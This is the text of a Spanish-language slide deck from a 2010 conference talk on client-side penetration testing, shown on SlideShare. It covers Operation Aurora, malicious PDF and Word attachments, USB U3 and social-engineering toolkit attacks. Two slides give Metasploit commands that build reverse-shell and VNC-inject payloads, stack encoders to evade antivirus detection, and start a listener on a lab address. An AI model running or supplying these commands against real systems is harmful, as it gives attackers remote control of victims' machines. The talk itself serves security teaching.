SlideShare ist ein Scribd-Unternehmen logo
1 von 70
What Work’s On
Client Side Pentesting
           CAMPUS PARTY COLOMBIA 2010




   I’m a Pentester         I’m a User
Leonardo Pigñer




             www.base4sec.com


                  @base4sec
iLife
kungfoosion.com

@kfs
lpigner@base4sec.com


www.linkedin.com/in/lpigner
ekoparty.org
16-17 Septiembre 2010
Agenda
•   ¿ Por Qué Client Side ?

•   La Operación Aurora

•   Distribución y Ataques

•   Conclusión
¿ Por Qué Client Side ?
DIFERENTES TIPOS DE PENETRATION TESTING

                   No! Yo tengo       Jodanse!
  Wardialing      un 0-day para       Yo entro
  es lo mejor!        IIS 6.0!       caminando




 Phone Attacker   Network Attacker   Social Engineer
INTERNET

                                       ATACANTE




           Firewall
                          DMZ


          LAN

                          SMTP   WWW



DOMINIO         BASE DE
                 DATOS
INTERNET

                                         ATACANTE




                                 Web App FW
              IPS
           Firewall              Reverse Proxy
                          DMZ          IDS


          LAN

                          SMTP   WWW



DOMINIO         BASE DE
                 DATOS
INTERNET



 Firewall   DMZ



LAN
Agenda
•   ¿ Por Qué Client Side ?

•   La Operación Aurora

•   Distribución y Ataques

•   Conclusión
La Operación
   Aurora
12 de Enero
            de 2010




                “ataques altamente sofisticados y
               dirigidos ... originados desde China”


[2] Google Blog: A new approach to China
+ 30
[1] Wikipedia: Operation Aurora
“Operación Aurora”
Google se va de China (?)
Google.cn
Google.com.ar
“illegal
          flower
         tribute”
[4] Wikipedia: Illegal flower tribute
PDF, DOC, XLS, CAD, E-mail
                                                                      Texas
      y el resto...




                                                                              Taiwan
                                                         AR
                                                      ,R
                                                  C AB




[3] Mandiant M-Trends “the advanced persistent threat”
0-day para IE 6-7-8

          -   12 de Enero: Anuncio de Google
          -   14 de Enero: Exploit en Wepawet
          -   14 de Enero: Advisory de Microsoft
          -   15 de Enero: PoC de MetaSploit
          -   21 de Enero: Microsoft update (fuera de ciclo)

[6] Wepawet exploit
[7] German government warns against using MS Explorer
www




DEMO #1 “Aurora”
Mas información en:
KUNGFOOSION: Estalló la CyberGuerra!
OSVDB 61697
This module exploits a memory corruption flaw in Internet
Explorer. This flaw was found in the wild and was a key
component of the "Operation Aurora" attacks that lead to
the compromise of a number of high profile companies. The
exploit code is a direct port of the public sample published
to the Wepawet malware analysis site. The technique used
by this module is currently identical to the public sample, as
such, only Internet Explorer 6 can be reliably exploited.

Afecta a:
- Internet Explorer 6
- Internet Explorer 7
- Internet Explorer 8
Agenda
•   ¿ Por Qué Client Side ?

•   La Operación Aurora

•   Distribución y Ataques

•   Conclusión
Distribución y Ataques
payload
   +
encoding
DEMO #2 “Payload + Encoding”

./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.162.138 LPORT=443 X > payload_1.exe

./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/
shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t
raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/
call4_dword_xor -c 3 -t exe -o payload_2.exe

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/
reverse_tcp LHOST=192.168.162.138 LPORT=443 E
Tienes un E-Mail
CASO de ESTUDIO (?)
25000 mails


1883 interesados
Browsers
Sistema
Operativo
Soporte de Java
Versiones
de Flash
Abre mi
          adjunto!




Tienes un E-Mail
Archivos Mas Utilizados

      3%

                     38%
47%


                7%
           4%




DOC    XLS                 PPT
PDF    otros
2008
                                              1968
                                               2009
                                              2195
                                               2010
                                               895




[8] PDF Based Target Attacks are Increasing
DEMO #3 “PDF Exploit”
Mas información en:
KUNGFOOSION: Explotando el 0-day de Adobe
Reader
OSVDB 61697
This module exploits a buffer overflow in Adobe Reader
and Adobe Acrobat Professional < 8.1.3. By creating a
specially crafted pdf that a contains malformed util.printf()
entry, an attacker may be able to execute arbitrary code.

Afecta a:
- Adobe Reader 8.1.2
+EXE




DEMO #4 “PDF + EXE”
Mas información en:
KUNGFOOSION: Embebiendo un Ejecutable dentro
de un PDF con MetaSploit
+ EXE
2008
                                              1968
                                               2009
                                              2195
                                               2010
                                               895




[8] PDF Based Target Attacks are Increasing
DEMO #5 “Word”
DEMO #5 “Word”
./msfpayload windows/vncinject/reverse_tcp
LHOST=192.168.162.138 LPORT=443 V >
macro_word.bas


./msfcli exploit/multi/handler PAYLOAD=windows/
vncinject/reverse_tcp LHOST=192.168.162.138
LPORT=443 E
La Recepcionista
DEMO #6 “USB U3”
Mas información en:
KUNGFOOSION: Ataque USB U3 con MetaSploit
SET
                      social engineering toolkit



“The Java Applet Attack”
Mas información en:
KUNGFOOSION: Ingeniería Social con Applets
firmados de Java en MetaSploit
Conclusión
Preguntas ?
Gracias!
kungfoosion.com

@kfs
lpigner@base4sec.com


www.linkedin.com/in/lpigner

Weitere ähnliche Inhalte

Ähnlich wie Leonardo pigner sy_r_campusparty2010

RESUMEN MODULO TIC's
RESUMEN MODULO TIC'sRESUMEN MODULO TIC's
RESUMEN MODULO TIC's
Joselowis
 
Presentación3 carné 12214020
Presentación3 carné 12214020Presentación3 carné 12214020
Presentación3 carné 12214020
Jose Anibal Gomez
 
Presentación3 carné 12214020
Presentación3 carné 12214020Presentación3 carné 12214020
Presentación3 carné 12214020
Gladis1221
 
Presentación3 carné gladis12214020
Presentación3 carné gladis12214020 Presentación3 carné gladis12214020
Presentación3 carné gladis12214020
GladisMarroquin
 
Iker goni hermoso_powerpoint_microsoft
Iker goni hermoso_powerpoint_microsoftIker goni hermoso_powerpoint_microsoft
Iker goni hermoso_powerpoint_microsoft
hhhhhh bh jjjj
 

Ähnlich wie Leonardo pigner sy_r_campusparty2010 (20)

Android reversing 101.pdf
Android reversing 101.pdfAndroid reversing 101.pdf
Android reversing 101.pdf
 
Pre3
Pre3Pre3
Pre3
 
Presentacion barcamp
Presentacion barcampPresentacion barcamp
Presentacion barcamp
 
RESUMEN MODULO TIC's
RESUMEN MODULO TIC'sRESUMEN MODULO TIC's
RESUMEN MODULO TIC's
 
Tipos de sistemas operativos
Tipos de sistemas operativosTipos de sistemas operativos
Tipos de sistemas operativos
 
Meetup app-moviles
Meetup app-movilesMeetup app-moviles
Meetup app-moviles
 
Smartphone: Herramienta de Bolsillo de un Hacker.
Smartphone: Herramienta de Bolsillo de un Hacker.Smartphone: Herramienta de Bolsillo de un Hacker.
Smartphone: Herramienta de Bolsillo de un Hacker.
 
Web 2.0
Web 2.0Web 2.0
Web 2.0
 
Web 2.0
Web 2.0Web 2.0
Web 2.0
 
Presentación3 carné 12214020
Presentación3 carné 12214020Presentación3 carné 12214020
Presentación3 carné 12214020
 
Presentación3 carné 12214020
Presentación3 carné 12214020Presentación3 carné 12214020
Presentación3 carné 12214020
 
Presentación3 carné gladis12214020
Presentación3 carné gladis12214020 Presentación3 carné gladis12214020
Presentación3 carné gladis12214020
 
Presentacion 03
Presentacion 03Presentacion 03
Presentacion 03
 
Cloud security adoption sophos
Cloud security adoption sophosCloud security adoption sophos
Cloud security adoption sophos
 
tehnik mobile hacking
tehnik mobile hackingtehnik mobile hacking
tehnik mobile hacking
 
Portafolio digital
Portafolio digitalPortafolio digital
Portafolio digital
 
Pres3 (menu)
Pres3 (menu)Pres3 (menu)
Pres3 (menu)
 
INTRODUCCION A ANDROID
INTRODUCCION A ANDROIDINTRODUCCION A ANDROID
INTRODUCCION A ANDROID
 
Revista informatica
Revista informaticaRevista informatica
Revista informatica
 
Iker goni hermoso_powerpoint_microsoft
Iker goni hermoso_powerpoint_microsoftIker goni hermoso_powerpoint_microsoft
Iker goni hermoso_powerpoint_microsoft
 

Mehr von campus party

¿Qué es SCADA y cómo me afecta su (in)seguridad?
¿Qué es SCADA y cómo me afecta su (in)seguridad? ¿Qué es SCADA y cómo me afecta su (in)seguridad?
¿Qué es SCADA y cómo me afecta su (in)seguridad?
campus party
 
Producción del largometraje pequeñas voces
Producción del largometraje pequeñas vocesProducción del largometraje pequeñas voces
Producción del largometraje pequeñas voces
campus party
 
Conferencia: Aplicaciones y el reto del desarrollo móvil
Conferencia: Aplicaciones y el reto del desarrollo móvilConferencia: Aplicaciones y el reto del desarrollo móvil
Conferencia: Aplicaciones y el reto del desarrollo móvil
campus party
 
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel ContrerasComo sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
campus party
 
X taller bluevialiminal
X taller bluevialiminalX taller bluevialiminal
X taller bluevialiminal
campus party
 
X liminal buevia 2 (dllo.)-taller
X liminal buevia 2 (dllo.)-tallerX liminal buevia 2 (dllo.)-taller
X liminal buevia 2 (dllo.)-taller
campus party
 
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1X elalgoritmodelamemoria maria juliana soto (social media) (1) 1
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1
campus party
 
Creación transmediática y comunidades en práctica
Creación transmediática y comunidades en prácticaCreación transmediática y comunidades en práctica
Creación transmediática y comunidades en práctica
campus party
 
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...Implementación de Cloud Computing con Software Libre y medidas de seguridad p...
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...
campus party
 

Mehr von campus party (20)

Titulo
Titulo Titulo
Titulo
 
¿Qué es SCADA y cómo me afecta su (in)seguridad?
¿Qué es SCADA y cómo me afecta su (in)seguridad? ¿Qué es SCADA y cómo me afecta su (in)seguridad?
¿Qué es SCADA y cómo me afecta su (in)seguridad?
 
Producción del largometraje pequeñas voces
Producción del largometraje pequeñas vocesProducción del largometraje pequeñas voces
Producción del largometraje pequeñas voces
 
Conferencia: Aplicaciones y el reto del desarrollo móvil
Conferencia: Aplicaciones y el reto del desarrollo móvilConferencia: Aplicaciones y el reto del desarrollo móvil
Conferencia: Aplicaciones y el reto del desarrollo móvil
 
Liminal Bluevia 1
Liminal Bluevia 1Liminal Bluevia 1
Liminal Bluevia 1
 
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel ContrerasComo sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
 
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel ContrerasComo sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
Como sería un viaje a la velocidad de la luz - Miguel Ángel Contreras
 
X taller bluevialiminal
X taller bluevialiminalX taller bluevialiminal
X taller bluevialiminal
 
X liminal buevia 2 (dllo.)-taller
X liminal buevia 2 (dllo.)-tallerX liminal buevia 2 (dllo.)-taller
X liminal buevia 2 (dllo.)-taller
 
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1X elalgoritmodelamemoria maria juliana soto (social media) (1) 1
X elalgoritmodelamemoria maria juliana soto (social media) (1) 1
 
Theremin Alfredo Vargas
Theremin Alfredo Vargas Theremin Alfredo Vargas
Theremin Alfredo Vargas
 
Sonido y cine Ricardo Escallon
Sonido y cine Ricardo Escallon Sonido y cine Ricardo Escallon
Sonido y cine Ricardo Escallon
 
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Bautista
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés BautistaPhotoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Bautista
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Bautista
 
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Fonseca
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés FonsecaPhotoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Fonseca
Photoshop para fotógrafos. Del cuarto oscuro al cuarto digital - Andrés Fonseca
 
Aseguramiento de Vulnerabilidades Web con tecnologías OWASP
Aseguramiento de Vulnerabilidades Web con tecnologías OWASPAseguramiento de Vulnerabilidades Web con tecnologías OWASP
Aseguramiento de Vulnerabilidades Web con tecnologías OWASP
 
Mundos virtuales inmersivos y social shopping
Mundos virtuales inmersivos y social shopping Mundos virtuales inmersivos y social shopping
Mundos virtuales inmersivos y social shopping
 
Creación transmediática y comunidades en práctica
Creación transmediática y comunidades en prácticaCreación transmediática y comunidades en práctica
Creación transmediática y comunidades en práctica
 
Android+Arduino
Android+ArduinoAndroid+Arduino
Android+Arduino
 
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...Implementación de Cloud Computing con Software Libre y medidas de seguridad p...
Implementación de Cloud Computing con Software Libre y medidas de seguridad p...
 
Linux en caja
Linux en cajaLinux en caja
Linux en caja
 

Kürzlich hochgeladen

redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativa
nicho110
 

Kürzlich hochgeladen (11)

Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
Resistencia extrema al cobre por un consorcio bacteriano conformado por Sulfo...
 
investigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXIinvestigación de los Avances tecnológicos del siglo XXI
investigación de los Avances tecnológicos del siglo XXI
 
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptxEVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
EVOLUCION DE LA TECNOLOGIA Y SUS ASPECTOSpptx
 
Avances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvanaAvances tecnológicos del siglo XXI 10-07 eyvana
Avances tecnológicos del siglo XXI 10-07 eyvana
 
Avances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estosAvances tecnológicos del siglo XXI y ejemplos de estos
Avances tecnológicos del siglo XXI y ejemplos de estos
 
Guia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos BasicosGuia Basica para bachillerato de Circuitos Basicos
Guia Basica para bachillerato de Circuitos Basicos
 
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptxPROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
PROYECTO FINAL. Tutorial para publicar en SlideShare.pptx
 
Buenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptxBuenos_Aires_Meetup_Redis_20240430_.pptx
Buenos_Aires_Meetup_Redis_20240430_.pptx
 
How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.How to use Redis with MuleSoft. A quick start presentation.
How to use Redis with MuleSoft. A quick start presentation.
 
redes informaticas en una oficina administrativa
redes informaticas en una oficina administrativaredes informaticas en una oficina administrativa
redes informaticas en una oficina administrativa
 
Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21Innovaciones tecnologicas en el siglo 21
Innovaciones tecnologicas en el siglo 21
 

Leonardo pigner sy_r_campusparty2010

  • 1. What Work’s On Client Side Pentesting CAMPUS PARTY COLOMBIA 2010 I’m a Pentester I’m a User
  • 2. Leonardo Pigñer www.base4sec.com @base4sec
  • 4.
  • 6. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  • 7. ¿ Por Qué Client Side ?
  • 8. DIFERENTES TIPOS DE PENETRATION TESTING No! Yo tengo Jodanse! Wardialing un 0-day para Yo entro es lo mejor! IIS 6.0! caminando Phone Attacker Network Attacker Social Engineer
  • 9. INTERNET ATACANTE Firewall DMZ LAN SMTP WWW DOMINIO BASE DE DATOS
  • 10. INTERNET ATACANTE Web App FW IPS Firewall Reverse Proxy DMZ IDS LAN SMTP WWW DOMINIO BASE DE DATOS
  • 11. INTERNET Firewall DMZ LAN
  • 12.
  • 13.
  • 14.
  • 15. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  • 16. La Operación Aurora
  • 17. 12 de Enero de 2010 “ataques altamente sofisticados y dirigidos ... originados desde China” [2] Google Blog: A new approach to China
  • 18. + 30 [1] Wikipedia: Operation Aurora
  • 20. Google se va de China (?)
  • 23. “illegal flower tribute” [4] Wikipedia: Illegal flower tribute
  • 24. PDF, DOC, XLS, CAD, E-mail Texas y el resto... Taiwan AR ,R C AB [3] Mandiant M-Trends “the advanced persistent threat”
  • 25.
  • 26. 0-day para IE 6-7-8 - 12 de Enero: Anuncio de Google - 14 de Enero: Exploit en Wepawet - 14 de Enero: Advisory de Microsoft - 15 de Enero: PoC de MetaSploit - 21 de Enero: Microsoft update (fuera de ciclo) [6] Wepawet exploit [7] German government warns against using MS Explorer
  • 27. www DEMO #1 “Aurora” Mas información en: KUNGFOOSION: Estalló la CyberGuerra!
  • 28. OSVDB 61697 This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the "Operation Aurora" attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited. Afecta a: - Internet Explorer 6 - Internet Explorer 7 - Internet Explorer 8
  • 29. Agenda • ¿ Por Qué Client Side ? • La Operación Aurora • Distribución y Ataques • Conclusión
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36. payload + encoding
  • 37. DEMO #2 “Payload + Encoding” ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 X > payload_1.exe ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.162.138 LPORT=443 R | msfencode -e x86/ shikata_ga_nai -c 10 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/countdown -c 3 -t raw | msfencode -e x86/ call4_dword_xor -c 3 -t exe -o payload_2.exe ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/ reverse_tcp LHOST=192.168.162.138 LPORT=443 E
  • 39.
  • 40.
  • 42.
  • 43.
  • 45.
  • 46.
  • 51. Abre mi adjunto! Tienes un E-Mail
  • 52.
  • 53.
  • 54. Archivos Mas Utilizados 3% 38% 47% 7% 4% DOC XLS PPT PDF otros
  • 55. 2008 1968 2009 2195 2010 895 [8] PDF Based Target Attacks are Increasing
  • 56. DEMO #3 “PDF Exploit” Mas información en: KUNGFOOSION: Explotando el 0-day de Adobe Reader
  • 57. OSVDB 61697 This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code. Afecta a: - Adobe Reader 8.1.2
  • 58. +EXE DEMO #4 “PDF + EXE” Mas información en: KUNGFOOSION: Embebiendo un Ejecutable dentro de un PDF con MetaSploit
  • 59. + EXE
  • 60. 2008 1968 2009 2195 2010 895 [8] PDF Based Target Attacks are Increasing
  • 62. DEMO #5 “Word” ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 V > macro_word.bas ./msfcli exploit/multi/handler PAYLOAD=windows/ vncinject/reverse_tcp LHOST=192.168.162.138 LPORT=443 E
  • 63.
  • 65. DEMO #6 “USB U3” Mas información en: KUNGFOOSION: Ataque USB U3 con MetaSploit
  • 66. SET social engineering toolkit “The Java Applet Attack” Mas información en: KUNGFOOSION: Ingeniería Social con Applets firmados de Java en MetaSploit
  • 68.